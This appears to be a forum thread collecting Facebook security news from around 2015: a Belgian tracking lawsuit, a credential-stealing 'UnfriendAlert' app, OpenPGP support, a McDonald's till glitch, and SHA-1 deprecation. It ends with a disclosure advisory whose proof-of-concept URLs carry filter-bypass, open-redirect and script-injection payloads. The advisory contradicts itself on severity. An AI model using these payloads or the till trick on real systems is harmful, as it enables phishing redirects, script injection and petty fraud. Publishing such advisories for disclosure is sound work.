Facebook is being taken to court by the Belgian privacy commissioner over claims it tracks people across the web. The country's Privacy Protection Commission (CPP) also accused Facebook of tracking the browsing habits of non-users, as well as its own members. The action follows criticism of Facebook by the same body in May. Facebook said it was surprised that the CPP had taken the "theatrical action" because it was due to meet the watchdog this week to discuss its concerns. The CPP said it took the decision because Facebook did not provide "satisfactory answers" to the questions it raised last month, according to a spokeswoman. The commission, which is working with German, Dutch, French and Spanish counterparts, accused Facebook of trampling on European privacy laws. A Facebook spokesman said: "We were surprised and disappointed that, after the [CPP] had already agreed to meet with us on 19 June to discuss their recommendations, they took the theatrical action of bringing Facebook Belgium to court on the day beforehand. "Although we are confident that there is no merit to the [CPP]'s case, we remain happy to work with them in an effort to resolve their concerns, through a dialogue with us at Facebook Ireland and with our regulator, the Irish Data Protection Commissioner." The commission has asked the court for an immediate order banning Facebook from monitoring non-users in particular, which it may do via plug-ins or cookies. In the past, Facebook has claimed that the Belgian commission's jurisdiction is "unclear" because the American firm is regulated in Europe by the Irish Data Protection Commissioner. It also defended its actions when the Belgian commission released its report last month, saying that most websites used cookies, which it said has been an "industry standard for more than 15 years". 14. Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default. So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience. Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine. UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials. UnfriendAlert Stealing your Facebook Credentials: Security researchers at Malwarebytes have warned users of the UnfriendAlert app saying that the notorious app asks users to login with their Facebook credentials to activate unfriends monitoring and alert service for your Facebook profile. Facebook has provided API OAuth login system for third party applications, where users don't need to provide their Facebook credentials to them. So you should never submit your Facebook password to any third party service or desktop software in any case. Once you enter your login credentials, UnfriendAlert will send it to the website "yougotunfriended.com" owned by attackers. Late last month, UnfriendAlert was also classified as potentially unwanted program (PUP) which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in your Chrome, Firefox, and Internet Explorer, making you fail to block them. Uninstall UnfriendAlert and Change your Password Now! So users are recommended to uninstall UnfriendAlert App from your computer, and besides removing this, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit." Always do some research before installing any third party application as your one single mistake could compromise your online security and privacy in various ways. Source
  15. Now No Government Can Spy On Its Citizens! Taking a cue from Google and Apple, Facebook for the first time is giving its users more encryption options to keep their information private, infuriating agencies like FBI and NSA who believe that “law enforcement and national security investigators need to be able to access communications and information to obtain the evidence necessary to prevent crime and bring criminals to justice in a court of law” and that locking user data places lives in danger by limiting government surveillance. The US government who recently said they will stop spying on Americans is up in arms because this new encryption won’t let them spy on Americans. In a blogpost, Facebook explained how the feature will work: “It’s very important to us that the people who use Facebook feel safe and can trust that their connection to Facebook is secure…Whilst Facebook seeks to secure connections to your email provider with TLS, the stored content of those messages may be accessible as plaintext (with attachments) to anyone who accesses your email provider or email account. To enhance the privacy of this email content, today we are gradually rolling out an experimental new feature that enables people to add OpenPGP public keys to their profile; these keys can be used to “end-to-end” encrypt notification emails sent from Facebook to your preferred email accounts. People may also choose to share OpenPGP keys from their profile, with or without enabling encrypted notifications.” Created as PGP (which stands for “pretty good privacy”), nearly 25 years ago by Phil Zimmermann, OpenPGP is one of the most popular available standards for protecting email with public key encryption. You will be able to update your own public key, using a desktop browser, at: https://www.facebook.com/me/about?section=contact-info The new move will allow users to encrypt notifications sent from the social networking website to their email addresses, protecting potentially sensitive emails, such as a request for a new password, from hackers, spies or anybody who does not have the user’s private key. “It also means that people who activate the email encryption and then lose their private key cannot turn to Facebook for help. The social network would have a copy of the public key uploaded to a user’s Facebook profile, but encrypted chats or emails off the site would still require the users’ private key to unlock. Other account recovery methods like SMS and Trusted Contacts can still work without relying upon email recovery,” explains Jay Nancarrow, a communications manager with Facebook. ??????????????The Committee to Protect Journalists has praised Facebook’s encryption decision. “Facebook has taken an important step to help protect users’ private communications by default, and make the risky environment, in which journalists work, a little bit safer,” said CPJ Internet Advocacy Coordinator Geoffrey King.

  17. Viral Facebook post shows how buyers can get meals at half the price from McDonald’s Self-Serving exploiting a system glitch Customers in Australia were treated to a 50% discount meal due to a glitch in the self-service system at a McDonald’s unit. The fault could be made full use of straight from the menu option. Had someone not posted a video on Facebook explaining the steps to get the price cut, probably McDonald’s would have taken some time to find the fault. Max Jalal shared the mobile phone footage showing how he and his group of friends get a family value Dinner Box that usually costs $19.95 / €17.50 for just $9.95 / €8.80 by doing nothing but using the self-serve tills. Jalal suggests going with the option to pay at the counter instead of the machine, in order to keep the employees unaware of the trick. Max Jalal selects a $20 dinner box, then his friend doing the filming, is heard saying: “This is the best bit, watch this.” He then selects an L and P option from the drinks menu and adds it to his bill, but it reduces the total price down to $17.20. He then repeats this step three more times until the total is reduced to less than half. The option is easy to locate as it shows no image of a product or price. Jalal’s bill was half the original value after repeating this step four times. It seemed like like the glitch could not be exploited further than this. The video clip was shot in a branch of the fast-food retailer in Melbourne, Australia. As expected, the Facebook post went viral and managed to garner a lot of attention. The video clip was viewed by more than 1.5 million people after it was posted to Facebook and shared. Self-service systems have been available in other parts of the world for years, but it is not clear if this process has the same effect on them too. The machine at the respective location has been fixed by McDonald’s Australia and the machine should now work as it is meant to be. It looks apparently that this was an exceptional case. A McDonald’s spokesman speaking to Daily Mail Australia said: “It is a new computer system and the nature of computer systems mean sometimes glitches can happen.” He added he was “fairly confident” there weren’t any other faults in the system that would let people to reduce the price of their meal. 19. Facebook has set the date: on September 30, the ancient and creaking SHA-1 hashing algorithm will make its tumbril trip and get the chop. SHA-1, designed by the NSA in 1995, is a one-way algorithm: a block of data is turned into a message digest. The digest can't be turned back into the original message, but serves as a digital signature confirming the authenticity of (for example) the software you've downloaded. And it's long been on the end-of-life list, because it's vulnerable to collision attacks – different blocks of data can present the same SHA-1 hash, allowing malware to verify as if it were authentic. From October 1, The Social NetworkTM says, third-party apps signed with SHA-1 will no longer be able to connect to Facebook. As Facebook's Adam Gross blogs, the move is in line with the Certificate Authority and Browser Forum's intention to sunset SHA-1 by January 2016. “We'll be updating our servers to stop accepting SHA-1 based connections before this final date, on October 1, 2015. After that date, we'll require apps and sites that connect to Facebook to support the more secure SHA-2 connections”, Gross wrote. Facebook recommends that “applications, SDKs, or devices that connect to Facebook” be checked for SHA-2 support, to avoid user irritation. The migration hasn't been without its detractors. Earlier this year, infosec bods told The Register the shift poses challenges. If users see disruption – for example, too many “insecure site” warnings – they fear that trust in the Internet will be undermined. Source

  21. In this era of Global surveillance, we all are worried about the privacy of our communication and sensitive data. There is no guarantee that our data is not being snooped on, but there is a solution — PGP (Pretty Good Privacy). PGP (Pretty Good Privacy) is more than 20 years old technology but is yet not widely adopted. PGP is an open source end-to-end encryption standard to encrypt e-mails, protecting you against companies, governments, or criminals spying on your Internet connection. But... ...the tool is too complicated for most of the people to implement and use. However, Facebook is now encouraging its users to use PGP and communicate by sending encrypted emails, adding the popular OpenPGP email encryption standard as an extra layer of security for the cautious. According to the latest announcement, you can now upload your Public PGP key to your Facebook profile so that anyone with your public key can send you encrypted emails. By giving such option to users, Facebook could really help rapid adoption of PGP encryption standard worldwide. The Social Networking Giant has plans to encrypt all its notification emails to users who use PGP or GPG (GNU Privacy Guard), as Facebook currently sends you emails alerts for private messages, password changes, and other account notifications that may be sensitive. All the emails you receive from Facebook will be protected with encryption, ensuring that no one — even NSA or any other spy agency — can read the content of the messages without the access to your private key. 24. Document Title: =============== Facebook #26 - Filter Bypass & Exception Handling Redirect Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1483 http://www.vulnerability-lab.com/get_content.php?id=1484 Video View: https://www.youtube.com/watch?v=I65zFWF-pMg Release Date: ============= 2015-05-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1483 Common Vulnerability Scoring System: ==================================== 5.1 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass and open redirect web vulnerability in the official Facebook online-service framework. Vulnerability Disclosure Timeline: ================================== 2015-05-01: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-05-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Framework - Content Management System 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A filter validation issue is existant in the exception-handling that normally redirects to the original facebook source. Ever if an error comes up the website will show the context in the secure exception and redirects on okey click to the original valid source. In case of terminating the string (%00%00_%3F) with extended <_ it is possible to bypass the exception-handling filter exception to redirect invalid source to an external target. The video demonstrates how to bypass the filter validation by confusing the context copying with the non encoded url that invalid. By generating a payload that is ahead in the display value and atleast in the url ref the target exception redirect can be manipulated. Proof of Concept (PoC): ======================= https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble Payload: 3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_ F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble<_ PoC Video(s): The video demonstrates how to evade the filter validation of the message context that is delivered by a url link. The researcher demonstrates how to bypass the basic encoding by preparing a valid exception with unauthorized redirect. Security Risk: ============== The security risk of the filter bypass and exception redirect web vulnerability is estimated as medium. (CVSS 5.1) The same payload to evade the filter validation can be used to other sections and exceptions that redirect the ref with the same conditions.
